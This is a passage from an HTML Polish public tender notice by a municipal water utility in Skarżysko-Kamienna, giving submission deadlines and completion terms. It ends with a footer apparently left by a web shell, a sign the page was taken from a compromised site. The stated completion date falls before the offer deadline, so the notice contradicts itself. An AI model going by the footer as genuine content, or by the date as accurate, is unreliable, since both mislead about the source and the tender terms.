11. w przypadku zmian:
-  danych teleadresowych w przypadku ich zamiany, 
-  wynagrodzenia w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpwik-skarzysko.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji Spółka z o.o. 26-110 Skarżysko-Kamienna, ul. Cicha 8 pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2015 godzina 10:50, miejsce: Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji Spółka z o.o. 26-110 Skarżysko-Kamienna, ul. Cicha 8 , sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji - W odniesieniu do kryterium termin realizacji - Zamawiający przewiduje wykonanie przedmiotu zamówienia w terminie nie dłuższym niż 40 dni od dnia podpisania umowy oraz nieprzekraczalnym terminie do dnia 10.01.2015r.  Z uwagi na zakres zamówienia Zamawiający zaznacza, iż minimalny racjonalny termin realizacji zamówienia jaki może zaoferować Wykonawca to 30 dni. Jeżeli Wykonawca zaoferuje termin krótszy niż 30 dni, który poddaje w wątpliwość możliwość prawidłowej realizacji zamówienia, do oceny oferty Zamawiający przyjmie termin 30 dni..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com